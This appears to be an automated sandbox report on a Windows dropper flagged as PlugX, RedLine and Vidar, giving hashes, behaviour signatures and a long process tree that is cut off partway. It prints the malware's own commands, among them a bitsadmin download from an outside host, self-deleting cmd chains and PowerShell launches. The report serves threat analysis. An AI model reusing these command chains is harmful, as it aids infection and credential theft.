Analysis

  • max time kernel
    56s
  • max time network
    150s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    04-05-2021 09:56

General

  • Target

    E73E4BC10B7F598BE39D301C1FE89961.exe

  • Size

    7.0MB

  • MD5

    e73e4bc10b7f598be39d301c1fe89961

  • SHA1

    b4d75eae000cb9c26421773d321366242aa13ee3

  • SHA256

    87bce52ffa3eaa55981a2dd9af96ce156249a9bfcfd9b3930252cdeff9e8633d

  • SHA512

    35fa8a1889b21db2217ddfa1dc171efd231f775333d839d37121c8c1953b4bef9edbb44b49f4fee1014b4df3ab5c412c06fc423efd2bee719b96f4e75723b4a6

Malware Config

Signatures

  • PlugX

    PlugX is a RAT (Remote Access Trojan) that has been around since 2008.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 1 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Blocklisted process makes network request 3 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 2 IoCs
  • Executes dropped EXE 64 IoCs
  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • VMProtect packed file 3 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 55 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 5 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 10 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 34 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 5 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 2 IoCs
  • Download via BitsAdmin 1 TTPs 2 IoCs
  • Kills process with taskkill 4 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 19 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Runs ping.exe 1 TTPs 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 5 IoCs
  • Suspicious use of SetWindowsHookEx 9 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s WpnService
    1⤵
      PID:2632
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2624
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Browser
      1⤵
        PID:2536
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
        1⤵
          PID:2376
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
          1⤵
            PID:2336
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
            1⤵
              PID:1824
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s SENS
              1⤵
                PID:1368
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                1⤵
                  PID:1260
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s Themes
                  1⤵
                    PID:1236
                  • C:\Users\Admin\AppData\Local\Temp\E73E4BC10B7F598BE39D301C1FE89961.exe
                    "C:\Users\Admin\AppData\Local\Temp\E73E4BC10B7F598BE39D301C1FE89961.exe"
                    1⤵
                    • Drops file in Program Files directory
                    • Suspicious use of WriteProcessMemory
                    PID:3400
                    • C:\Program Files (x86)\Microsoft Data\Versium Research\hjjgaa.exe
                      "C:\Program Files (x86)\Microsoft Data\Versium Research\hjjgaa.exe"
                      2⤵
                      • Executes dropped EXE
                      • Adds Run key to start application
                      • Suspicious use of WriteProcessMemory
                      PID:2200
                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                        3⤵
                        • Executes dropped EXE
                        PID:4260
                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                        3⤵
                          PID:4932
                      • C:\Program Files (x86)\Microsoft Data\Versium Research\RunWW.exe
                        "C:\Program Files (x86)\Microsoft Data\Versium Research\RunWW.exe"
                        2⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Checks processor information in registry
                        • Suspicious behavior: EnumeratesProcesses
                        PID:2452
                        • C:\Windows\SysWOW64\cmd.exe
                          "C:\Windows\System32\cmd.exe" /c taskkill /im RunWW.exe /f & timeout /t 6 & del /f /q "C:\Program Files (x86)\Microsoft Data\Versium Research\RunWW.exe" & del C:\ProgramData\*.dll & exit
                          3⤵
                            PID:3284
                            • C:\Windows\SysWOW64\taskkill.exe
                              taskkill /im RunWW.exe /f
                              4⤵
                              • Kills process with taskkill
                              PID:4608
                            • C:\Windows\SysWOW64\timeout.exe
                              timeout /t 6
                              4⤵
                              • Delays execution with timeout.exe
                              PID:4868
                        • C:\Program Files (x86)\Microsoft Data\Versium Research\jg7_7wjg.exe
                          "C:\Program Files (x86)\Microsoft Data\Versium Research\jg7_7wjg.exe"
                          2⤵
                          • Executes dropped EXE
                          • Checks whether UAC is enabled
                          • Drops file in Program Files directory
                          PID:2600
                        • C:\Program Files (x86)\Microsoft Data\Versium Research\guihuali-game.exe
                          "C:\Program Files (x86)\Microsoft Data\Versium Research\guihuali-game.exe"
                          2⤵
                          • Executes dropped EXE
                          • Drops file in Program Files directory
                          • Suspicious use of SetWindowsHookEx
                          • Suspicious use of WriteProcessMemory
                          PID:2680
                          • C:\Windows\SysWOW64\rundll32.exe
                            "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                            3⤵
                            • Loads dropped DLL
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:2976
                        • C:\Program Files (x86)\Microsoft Data\Versium Research\LabPicV3.exe
                          "C:\Program Files (x86)\Microsoft Data\Versium Research\LabPicV3.exe"
                          2⤵
                          • Executes dropped EXE
                          • Suspicious use of WriteProcessMemory
                          PID:3000
                          • C:\Users\Admin\AppData\Local\Temp\is-2KCBA.tmp\LabPicV3.tmp
                            "C:\Users\Admin\AppData\Local\Temp\is-2KCBA.tmp\LabPicV3.tmp" /SL5="$10200,506127,422400,C:\Program Files (x86)\Microsoft Data\Versium Research\LabPicV3.exe"
                            3⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Suspicious use of WriteProcessMemory
                            PID:3736
                            • C:\Users\Admin\AppData\Local\Temp\is-PSQPC.tmp\3316505.exe
                              "C:\Users\Admin\AppData\Local\Temp\is-PSQPC.tmp\3316505.exe" /S /UID=lab214
                              4⤵
                              • Drops file in Drivers directory
                              • Executes dropped EXE
                              • Adds Run key to start application
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4456
                              • C:\Program Files\Mozilla Firefox\UJKMEVAAEW\prolab.exe
                                "C:\Program Files\Mozilla Firefox\UJKMEVAAEW\prolab.exe" /VERYSILENT
                                5⤵
                                • Executes dropped EXE
                                PID:3904
                                • C:\Users\Admin\AppData\Local\Temp\is-6EFE4.tmp\prolab.tmp
                                  "C:\Users\Admin\AppData\Local\Temp\is-6EFE4.tmp\prolab.tmp" /SL5="$40086,575243,216576,C:\Program Files\Mozilla Firefox\UJKMEVAAEW\prolab.exe" /VERYSILENT
                                  6⤵
                                  • Executes dropped EXE
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of FindShellTrayWindow
                                  PID:4316
                              • C:\Users\Admin\AppData\Local\Temp\1e-57a21-f69-e4996-7704de25d83df\Fulusuhaly.exe
                                "C:\Users\Admin\AppData\Local\Temp\1e-57a21-f69-e4996-7704de25d83df\Fulusuhaly.exe"
                                5⤵
                                • Executes dropped EXE
                                • Checks computer location settings
                                PID:4692
                              • C:\Users\Admin\AppData\Local\Temp\ed-3f502-c74-6b79d-2a0e74f16e18f\Moqaetaelyle.exe
                                "C:\Users\Admin\AppData\Local\Temp\ed-3f502-c74-6b79d-2a0e74f16e18f\Moqaetaelyle.exe"
                                5⤵
                                • Executes dropped EXE
                                • Suspicious behavior: EnumeratesProcesses
                                PID:4948
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wytgrgib.pcf\sskiper.exe /s & exit
                                  6⤵
                                    PID:5500
                                    • C:\Users\Admin\AppData\Local\Temp\wytgrgib.pcf\sskiper.exe
                                      C:\Users\Admin\AppData\Local\Temp\wytgrgib.pcf\sskiper.exe /s
                                      7⤵
                                      • Executes dropped EXE
                                      PID:5760
                                      • C:\Users\Admin\AppData\Local\Temp\553855989.exe
                                        C:\Users\Admin\AppData\Local\Temp\553855989.exe
                                        8⤵
                                        • Executes dropped EXE
                                        PID:5212
                                      • C:\Users\Admin\AppData\Local\Temp\975115668.exe
                                        C:\Users\Admin\AppData\Local\Temp\975115668.exe
                                        8⤵
                                          PID:6212
                                        • C:\Windows\SysWOW64\cmd.exe
                                          "C:\Windows\system32\cmd.exe" /k ping 0 & del C:\Users\Admin\AppData\Local\Temp\wytgrgib.pcf\sskiper.exe & exit
                                          8⤵
                                            PID:6512
                                            • C:\Windows\SysWOW64\PING.EXE
                                              ping 0
                                              9⤵
                                              • Runs ping.exe
                                              PID:5544
                                      • C:\Windows\System32\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jocesoph.qji\KiffMainE1.exe & exit
                                        6⤵
                                          PID:6008
                                          • C:\Users\Admin\AppData\Local\Temp\jocesoph.qji\KiffMainE1.exe
                                            C:\Users\Admin\AppData\Local\Temp\jocesoph.qji\KiffMainE1.exe
                                            7⤵
                                            • Executes dropped EXE
                                            PID:5304
                                        • C:\Windows\System32\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wynjmyvu.v3u\001.exe & exit
                                          6⤵
                                            PID:4756
                                            • C:\Users\Admin\AppData\Local\Temp\wynjmyvu.v3u\001.exe
                                              C:\Users\Admin\AppData\Local\Temp\wynjmyvu.v3u\001.exe
                                              7⤵
                                                PID:5720
                                            • C:\Windows\System32\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\msjtoqv2.gsi\installer.exe /qn CAMPAIGN="654" & exit
                                              6⤵
                                                PID:4572
                                                • C:\Users\Admin\AppData\Local\Temp\msjtoqv2.gsi\installer.exe
                                                  C:\Users\Admin\AppData\Local\Temp\msjtoqv2.gsi\installer.exe /qn CAMPAIGN="654"
                                                  7⤵
                                                    PID:5732
                                                • C:\Windows\System32\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\js5bm43i.1yv\gpooe.exe & exit
                                                  6⤵
                                                    PID:6052
                                                    • C:\Users\Admin\AppData\Local\Temp\js5bm43i.1yv\gpooe.exe
                                                      C:\Users\Admin\AppData\Local\Temp\js5bm43i.1yv\gpooe.exe
                                                      7⤵
                                                      • Executes dropped EXE
                                                      PID:2308
                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                        8⤵
                                                        • Executes dropped EXE
                                                        PID:5532
                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                        8⤵
                                                          PID:5980
                                                    • C:\Windows\System32\cmd.exe
                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fbl1usej.b3x\google-game.exe & exit
                                                      6⤵
                                                        PID:3236
                                                        • C:\Users\Admin\AppData\Local\Temp\fbl1usej.b3x\google-game.exe
                                                          C:\Users\Admin\AppData\Local\Temp\fbl1usej.b3x\google-game.exe
                                                          7⤵
                                                          • Executes dropped EXE
                                                          • Suspicious use of SetWindowsHookEx
                                                          PID:4312
                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                            "C:\Windows\System32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\install.dll",install
                                                            8⤵
                                                            • Loads dropped DLL
                                                            • Modifies registry class
                                                            PID:5900
                                                      • C:\Windows\System32\cmd.exe
                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qkqlvk54.gca\y1.exe & exit
                                                        6⤵
                                                          PID:5272
                                                          • C:\Users\Admin\AppData\Local\Temp\qkqlvk54.gca\y1.exe
                                                            C:\Users\Admin\AppData\Local\Temp\qkqlvk54.gca\y1.exe
                                                            7⤵
                                                            • Executes dropped EXE
                                                            PID:5024
                                                        • C:\Windows\System32\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1efcefes.wdv\askinstall39.exe & exit
                                                          6⤵
                                                            PID:4608
                                                            • C:\Users\Admin\AppData\Local\Temp\1efcefes.wdv\askinstall39.exe
                                                              C:\Users\Admin\AppData\Local\Temp\1efcefes.wdv\askinstall39.exe
                                                              7⤵
                                                                PID:6176
                                                            • C:\Windows\System32\cmd.exe
                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mpvz5p0k.coj\setup.exe & exit
                                                              6⤵
                                                                PID:6240
                                                                • C:\Users\Admin\AppData\Local\Temp\mpvz5p0k.coj\setup.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\mpvz5p0k.coj\setup.exe
                                                                  7⤵
                                                                  • Executes dropped EXE
                                                                  PID:6492
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\mpvz5p0k.coj\setup.exe"
                                                                    8⤵
                                                                      PID:6788
                                                                      • C:\Windows\SysWOW64\PING.EXE
                                                                        ping 1.1.1.1 -n 1 -w 3000
                                                                        9⤵
                                                                        • Runs ping.exe
                                                                        PID:6908
                                                                • C:\Windows\System32\cmd.exe
                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jjmmlpxb.x0k\SunLabsPlayer.exe /S & exit
                                                                  6⤵
                                                                    PID:6768
                                                                    • C:\Users\Admin\AppData\Local\Temp\jjmmlpxb.x0k\SunLabsPlayer.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\jjmmlpxb.x0k\SunLabsPlayer.exe /S
                                                                      7⤵
                                                                      • Executes dropped EXE
                                                                      • Loads dropped DLL
                                                                      • Drops file in Program Files directory
                                                                      PID:6896
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nscB1B4.tmp\tempfile.ps1"
                                                                        8⤵
                                                                          PID:6268
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nscB1B4.tmp\tempfile.ps1"
                                                                          8⤵
                                                                          • Executes dropped EXE
                                                                          PID:5732
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nscB1B4.tmp\tempfile.ps1"
                                                                          8⤵
                                                                            PID:6136
                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nscB1B4.tmp\tempfile.ps1"
                                                                            8⤵
                                                                              PID:5776
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nscB1B4.tmp\tempfile.ps1"
                                                                              8⤵
                                                                                PID:5984
                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nscB1B4.tmp\tempfile.ps1"
                                                                                8⤵
                                                                                  PID:5328
                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nscB1B4.tmp\tempfile.ps1"
                                                                                  8⤵
                                                                                    PID:4776
                                                                                  • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                    "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                                                    8⤵
                                                                                    • Download via BitsAdmin
                                                                                    PID:5824
                                                                              • C:\Windows\System32\cmd.exe
                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zbmtplwm.wat\005.exe & exit
                                                                                6⤵
                                                                                  PID:7020
                                                                                  • C:\Users\Admin\AppData\Local\Temp\zbmtplwm.wat\005.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\zbmtplwm.wat\005.exe
                                                                                    7⤵
                                                                                      PID:3852
                                                                                  • C:\Windows\System32\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zxcl11wn.gwb\ifhwwyy.exe & exit
                                                                                    6⤵
                                                                                      PID:6264
                                                                                      • C:\Users\Admin\AppData\Local\Temp\zxcl11wn.gwb\ifhwwyy.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\zxcl11wn.gwb\ifhwwyy.exe
                                                                                        7⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:5184
                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                          8⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:6844
                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                          8⤵
                                                                                            PID:5312
                                                                                      • C:\Windows\System32\cmd.exe
                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\so05binh.h5c\toolspab1.exe & exit
                                                                                        6⤵
                                                                                          PID:6276
                                                                                          • C:\Users\Admin\AppData\Local\Temp\so05binh.h5c\toolspab1.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\so05binh.h5c\toolspab1.exe
                                                                                            7⤵
                                                                                            • Executes dropped EXE
                                                                                            • Suspicious use of SetThreadContext
                                                                                            PID:6616
                                                                                            • C:\Users\Admin\AppData\Local\Temp\so05binh.h5c\toolspab1.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\so05binh.h5c\toolspab1.exe
                                                                                              8⤵
                                                                                              • Executes dropped EXE
                                                                                              • Loads dropped DLL
                                                                                              • Checks SCSI registry key(s)
                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                              PID:6712
                                                                                • C:\Program Files (x86)\Microsoft Data\Versium Research\dp81GdX0OrCQ.exe
                                                                                  "C:\Program Files (x86)\Microsoft Data\Versium Research\dp81GdX0OrCQ.exe"
                                                                                  2⤵
                                                                                  • Executes dropped EXE
                                                                                  • Suspicious use of SetThreadContext
                                                                                  PID:188
                                                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                    C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                    3⤵
                                                                                      PID:1888
                                                                                  • C:\Program Files (x86)\Microsoft Data\Versium Research\BarSetpFile.exe
                                                                                    "C:\Program Files (x86)\Microsoft Data\Versium Research\BarSetpFile.exe"
                                                                                    2⤵
                                                                                    • Executes dropped EXE
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    • Suspicious use of WriteProcessMemory
                                                                                    PID:360
                                                                                    • C:\Users\Admin\AppData\Roaming\5373848.exe
                                                                                      "C:\Users\Admin\AppData\Roaming\5373848.exe"
                                                                                      3⤵
                                                                                      • Executes dropped EXE
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:4680
                                                                                    • C:\Users\Admin\AppData\Roaming\4370859.exe
                                                                                      "C:\Users\Admin\AppData\Roaming\4370859.exe"
                                                                                      3⤵
                                                                                      • Executes dropped EXE
                                                                                      • Adds Run key to start application
                                                                                      PID:4796
                                                                                      • C:\ProgramData\Windows Host\Windows Host.exe
                                                                                        "C:\ProgramData\Windows Host\Windows Host.exe"
                                                                                        4⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:5040
                                                                                    • C:\Users\Admin\AppData\Roaming\4929348.exe
                                                                                      "C:\Users\Admin\AppData\Roaming\4929348.exe"
                                                                                      3⤵
                                                                                      • Executes dropped EXE
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:5024
                                                                                  • C:\Program Files (x86)\Microsoft Data\Versium Research\lylal220.exe
                                                                                    "C:\Program Files (x86)\Microsoft Data\Versium Research\lylal220.exe"
                                                                                    2⤵
                                                                                    • Executes dropped EXE
                                                                                    • Suspicious use of WriteProcessMemory
                                                                                    PID:3088
                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-SU11U.tmp\lylal220.tmp
                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-SU11U.tmp\lylal220.tmp" /SL5="$10212,237286,153600,C:\Program Files (x86)\Microsoft Data\Versium Research\lylal220.exe"
                                                                                      3⤵
                                                                                      • Executes dropped EXE
                                                                                      • Loads dropped DLL
                                                                                      • Suspicious use of WriteProcessMemory
                                                                                      PID:428
                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-NDF0P.tmp\4_177039.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-NDF0P.tmp\4_177039.exe" /S /UID=lylal220
                                                                                        4⤵
                                                                                        • Drops file in Drivers directory
                                                                                        • Executes dropped EXE
                                                                                        • Adds Run key to start application
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:4340
                                                                                        • C:\Program Files\Windows Security\JXINOWSAKJ\irecord.exe
                                                                                          "C:\Program Files\Windows Security\JXINOWSAKJ\irecord.exe" /VERYSILENT
                                                                                          5⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:4736
                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-1PPD5.tmp\irecord.tmp
                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-1PPD5.tmp\irecord.tmp" /SL5="$20230,6139911,56832,C:\Program Files\Windows Security\JXINOWSAKJ\irecord.exe" /VERYSILENT
                                                                                            6⤵
                                                                                            • Executes dropped EXE
                                                                                            • Drops file in Program Files directory
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                            PID:4888
                                                                                            • C:\Program Files (x86)\recording\i-record.exe
                                                                                              "C:\Program Files (x86)\recording\i-record.exe" -silent -desktopShortcut -programMenu
                                                                                              7⤵
                                                                                              • Executes dropped EXE
                                                                                              • Loads dropped DLL
                                                                                              PID:4628
                                                                                        • C:\Users\Admin\AppData\Local\Temp\b0-a9942-d25-a0fa7-fdf4cdc79982e\Litixubexe.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\b0-a9942-d25-a0fa7-fdf4cdc79982e\Litixubexe.exe"
                                                                                          5⤵
                                                                                          • Executes dropped EXE
                                                                                          • Checks computer location settings
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          PID:4932
                                                                                        • C:\Users\Admin\AppData\Local\Temp\23-c9262-a1a-e7a8b-74398e40b9b1b\Dogovaecufa.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\23-c9262-a1a-e7a8b-74398e40b9b1b\Dogovaecufa.exe"
                                                                                          5⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:5112
                                                                                          • C:\Windows\System32\cmd.exe
                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fry2bkgg.r3k\sskiper.exe /s & exit
                                                                                            6⤵
                                                                                              PID:5524
                                                                                              • C:\Users\Admin\AppData\Local\Temp\fry2bkgg.r3k\sskiper.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\fry2bkgg.r3k\sskiper.exe /s
                                                                                                7⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:5812
                                                                                                • C:\Users\Admin\AppData\Local\Temp\787991217.exe
                                                                                                  C:\Users\Admin\AppData\Local\Temp\787991217.exe
                                                                                                  8⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:4952
                                                                                                • C:\Users\Admin\AppData\Local\Temp\1682013247.exe
                                                                                                  C:\Users\Admin\AppData\Local\Temp\1682013247.exe
                                                                                                  8⤵
                                                                                                    PID:6524
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    "C:\Windows\system32\cmd.exe" /k ping 0 & del C:\Users\Admin\AppData\Local\Temp\fry2bkgg.r3k\sskiper.exe & exit
                                                                                                    8⤵
                                                                                                      PID:6912
                                                                                                      • C:\Windows\SysWOW64\PING.EXE
                                                                                                        ping 0
                                                                                                        9⤵
                                                                                                        • Runs ping.exe
                                                                                                        PID:5944
                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qb2haade.1up\KiffMainE1.exe & exit
                                                                                                  6⤵
                                                                                                    PID:5948
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\qb2haade.1up\KiffMainE1.exe
                                                                                                      C:\Users\Admin\AppData\Local\Temp\qb2haade.1up\KiffMainE1.exe
                                                                                                      7⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:5156
                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xr2fy4jc.p5z\001.exe & exit
                                                                                                    6⤵
                                                                                                      PID:3672
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\xr2fy4jc.p5z\001.exe
                                                                                                        C:\Users\Admin\AppData\Local\Temp\xr2fy4jc.p5z\001.exe
                                                                                                        7⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:5512
                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ah1kairk.1ac\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                      6⤵
                                                                                                        PID:2772
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\ah1kairk.1ac\installer.exe
                                                                                                          C:\Users\Admin\AppData\Local\Temp\ah1kairk.1ac\installer.exe /qn CAMPAIGN="654"
                                                                                                          7⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Loads dropped DLL
                                                                                                          • Enumerates connected drives
                                                                                                          • Modifies system certificate store
                                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                                          PID:5432
                                                                                                          • C:\Windows\SysWOW64\msiexec.exe
